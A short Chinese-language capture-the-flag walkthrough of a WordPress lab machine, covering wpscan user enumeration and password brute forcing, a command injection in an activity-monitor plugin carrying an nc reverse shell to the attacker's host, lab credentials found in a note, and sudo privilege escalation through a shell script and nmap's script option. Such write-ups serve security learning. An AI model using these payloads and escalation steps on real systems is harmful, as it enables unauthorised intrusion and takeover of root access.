信息收集
只开了两个端口 22,80
先访问网站,和之前的靶机一样的套路,
添加域名解析
vim /etc/hosts
网站的信息,wordpress网站
扫描网站目录,有一个登录页
网站渗透
wpscan --url http://wordy/ -e
扫描用户
然后用用户字典和密码字典爆破
wpscan --url http://wordy -U user.txt -P passwords.txt
kali自带密码字典/usr/share/wordlists/rockyou.txt,不过默认没解压,需要你自己去解压
时间需要太长了,五个用户名就要半个多小时,得了实战还是能用一下的,打个靶机没必要,直接搜wp看别人的密码
用户:mark
密码:helpdesk01
登录之后先逛逛网站,看看能不能写进去一些文件
没什么可利用的,看看插件有什莫漏洞吗
Activity monitor
百度翻译一下就大概看出来要选哪个了,copy下来然后直接运行py文件
要什么给什么,然后就能上去了
不行不行,这个太不稳定了,执行个cd都报错
msf也不行
看看别人的,这块能执行,但是不能太长,如果是前端限制的话可以绕过
修改最大长度
127.0.0.1|nc -e /bin/bash 192.168.83.128 4444
向kali 4444端口反弹shell,kail监听4444
提权
拿到会话
先看有没有suid提权,没有,看看用户下面有什莫东西
jens有一个.sh,但是执行会报错,backups.tar.gz没权限?也没这个东西
mark有一个txt
Restore full functionality for the hyperdrive (need to speak to Jens)
Buy present for Sarah’s farewell party
Add new user: graham - GSo7isUM1D4 - done
Apply for the OSCP course
Buy new laptop for Sarah’s replacement
恢复超级硬盘的全部功能(需要与Jens交谈)
-为莎拉的告别派对买礼物
-添加新用户:graham-GSo7isUM1D4-完成
-申请OSCP课程
-买新的笔记本电脑给莎拉换
graham - GSo7isUM1D4 - done 新的用户名密码
切换用户,记得把最后一个用户下边也看看,虽然没什么东西
sudo -help
这个用户也没什么能执行的root命令
jens里面还有一个没权限的.sh,试试看,还是这样
没看懂,以后在纠结把
echo "/bin/bash" > backups.sh
sudo -u jens ./backups.sh
有个nmap不需要root密码
nmap提权,这里是7.40
低版本nmap提权(2.02至5.21)
nmap --interactive
!sh
这里用
echo 'os.execute("/bin/sh")' > shell
sudo nmap --script=shell
总结
还得了解一点linux命令,不然看都看不明白